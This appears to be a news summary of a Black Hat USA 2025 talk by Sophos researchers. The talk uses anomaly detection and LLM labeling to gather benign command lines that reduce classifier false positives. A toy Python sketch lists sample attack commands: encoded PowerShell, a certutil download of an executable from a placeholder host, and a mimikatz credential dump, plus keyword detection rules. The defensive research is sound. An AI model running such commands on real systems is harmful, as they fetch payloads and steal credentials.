
Cybersecurity Pulse

Enterprise • Cybersecurity • AI

Black Hat USA 2025 | Enhancing Command Line Classification with Benign Anomalous Data

Black Hat • February 25, 2026

Why It Matters

Reducing false positives lowers operational overhead and improves security teams’ response efficiency, making command‑line monitoring more reliable and affordable.

Key Takeaways

  • Anomaly detection feeds benign data to LLM labeling
  • Benign data diversifies the command‑line classifier's training set
  • False‑positive rates drop significantly after augmentation
  • Method scales using existing production logs
  • No need to isolate malicious anomalies first

Pulse Analysis

Anomaly detection has long been touted as a silver bullet for spotting malicious command‑line activity, yet its unsupervised nature often yields overwhelming false‑positive alerts. Security operations teams scramble to triage noisy alerts, draining resources and eroding confidence in automated defenses. The core issue lies in treating every deviation as suspicious, without distinguishing benign outliers that naturally occur in complex environments. This challenge has spurred researchers to rethink how anomaly signals are applied, shifting from direct threat identification to data enrichment for supervised models.
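To make the false-positive burden concrete, here is a back-of-envelope sketch. All numbers below are illustrative assumptions, not figures from the talk; the point is the base-rate effect, which holds for any realistic choice of rates:

```python
# Illustrative base-rate arithmetic (all rates are assumptions, not data
# from the Sophos briefing): even a detector with a low false-positive
# rate drowns analysts when malicious command lines are rare.
daily_commands = 1_000_000   # command lines logged per day (assumption)
malicious_rate = 1e-5        # fraction actually malicious (assumption)
tpr = 0.95                   # detector true-positive rate (assumption)
fpr = 0.01                   # detector false-positive rate (assumption)

malicious = daily_commands * malicious_rate           # 10 truly malicious
true_alerts = malicious * tpr                         # ~9.5 caught
false_alerts = (daily_commands - malicious) * fpr     # ~10,000 benign flagged
precision = true_alerts / (true_alerts + false_alerts)

print(f"true alerts/day:  {true_alerts:.1f}")
print(f"false alerts/day: {false_alerts:.0f}")
print(f"alert precision:  {precision:.2%}")
```

Under these assumptions roughly one alert in a thousand is real, which is exactly the triage burden the analysis describes.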

The Sophos team’s approach combines traditional anomaly detection with large language models (LLMs) to create a feedback loop that harvests benign command‑line instances. Anomaly detectors flag atypical commands, which are then passed to an LLM for contextual labeling. Rather than hunting for malicious strings, the pipeline extracts a rich, diverse set of non‑malicious commands that expand the training corpus of a supervised classifier. This infusion of varied benign data sharpens the model’s decision boundary, cutting false‑positive rates while preserving detection sensitivity. Crucially, the approach leverages existing production logs, eliminating the need for costly, manually curated malicious datasets.
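The loop just described can be sketched end to end. This is a minimal, self-contained illustration under loud assumptions: the bigram-rarity anomaly score stands in for a production detector, `llm_label()` is a keyword stub standing in for real LLM labeling, and all data, names, and thresholds are invented for the example, not taken from Sophos's implementation:

```python
from collections import Counter

# Toy production logs: routine commands repeated often, plus a few one-offs.
common = ["ls -la /home/user", "grep -r TODO src/", "kubectl get pods"]
oddballs = [
    "powershell -enc SQBFAFgA",                     # obfuscated: suspicious
    "certutil -urlcache -split -f http://x/y.exe",  # downloader: suspicious
    "tar czf backup.tgz /data",                     # unusual but benign
]
production_logs = common * 10 + oddballs

# 1. Stand-in anomaly detector: a command is anomalous when most of its
#    character bigrams are rare across the whole corpus.
def bigrams(s):
    return [s[i:i + 2] for i in range(len(s) - 1)]

profile = Counter(bg for cmd in production_logs for bg in bigrams(cmd))

def anomaly_score(cmd):
    bgs = bigrams(cmd)
    rare = sum(1 for bg in bgs if profile[bg] <= 2)
    return rare / max(len(bgs), 1)

candidates = sorted({c for c in production_logs if anomaly_score(c) > 0.5})

# 2. Stub for the LLM contextual labeler (a real deployment would prompt
#    an LLM; a keyword heuristic stands in here).
def llm_label(cmd):
    return "malicious" if "-enc" in cmd or "http://" in cmd else "benign"

# 3. Harvest the *benign* anomalies -- the diverse data the talk highlights.
benign_anomalies = [c for c in candidates if llm_label(c) == "benign"]

# 4. Augment the supervised classifier's training set with them
#    (0 = benign, 1 = malicious); retraining then proceeds as usual.
seed = [("ls", 0), ("whoami", 0), ("mimikatz.exe sekurlsa::logonpasswords", 1)]
augmented_training = seed + [(cmd, 0) for cmd in benign_anomalies]

print("benign anomalies harvested:", benign_anomalies)
```

Note that the anomaly score never decides "malicious" on its own; it only nominates candidates, and the labeler routes the benign ones into the training set, which is the role reversal the briefing describes.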

For enterprises, the implications are immediate. Lower false‑positive volumes translate to fewer analyst interruptions, faster incident response, and reduced operational spend. The methodology scales across large fleets, as the anomaly detector continuously supplies fresh benign samples, keeping the classifier up‑to‑date with evolving command‑line usage patterns. As AI‑driven labeling matures, this paradigm could extend beyond command‑line monitoring to other telemetry domains, signaling a broader shift toward hybrid unsupervised‑supervised security pipelines. Organizations adopting this strategy gain a more resilient detection posture while capitalizing on the cost efficiencies of automated data enrichment.

Original Description

Anomaly Detection Betrayed Us, so We Gave It a New Job: Enhancing Command Line Classification with Benign Anomalous Data
Anomaly detection in cybersecurity has long promised the ability to identify threats by highlighting deviations from expected behavior. For classifying malicious command lines, however, its practical application often results in high false positive rates, making it expensive and inefficient. But is that the whole story for command line anomaly detection? With recent innovations in AI, is there a new angle that we have yet to explore?
In this Briefing, we will explore that question by developing a pipeline that does not depend on anomaly detection as a point of failure. By combining anomaly detection with large language models (LLMs), we can confidently identify critical data that can be used to augment a dedicated command line classifier. Using anomaly detection to feed a different process avoids the potentially catastrophic false positive rates of an unsupervised method. Instead, we create improvements in a supervised model targeted towards classification.
Unexpectedly, the success of this method did not depend on anomaly detection locating malicious command lines. We gained a valuable insight: anomaly detection, when paired with LLM-based labeling, yields a remarkably diverse set of benign command lines. Leveraging this benign data when training command line classifiers significantly reduces false positive rates. Furthermore, it allows us to use plentiful existing data without the needles in a haystack that are malicious command lines in production data.
Attendees will gain an understanding of the methodology of our experiment, highlighting how diverse benign data identified through anomaly detection broadens the classifier's understanding and contributes to creating a more resilient detection system. By shifting focus from solely aiming to find malicious anomalies to harnessing benign diversity, we offer a potential paradigm shift in command line classification strategies. Learn how to easily implement this method in your detection systems at a large scale and low cost.
By:
Ben Gelman | Senior Data Scientist, Sophos
Sean Bergeron | Senior Data Scientist, Sophos
Presentation Materials Available at:
https://blackhat.com/us-25/briefings/schedule/?#anomaly-detection-betrayed-us-so-we-gave-it-a-new-job-enhancing-command-line-classification-with-benign-anomalous-data-46769
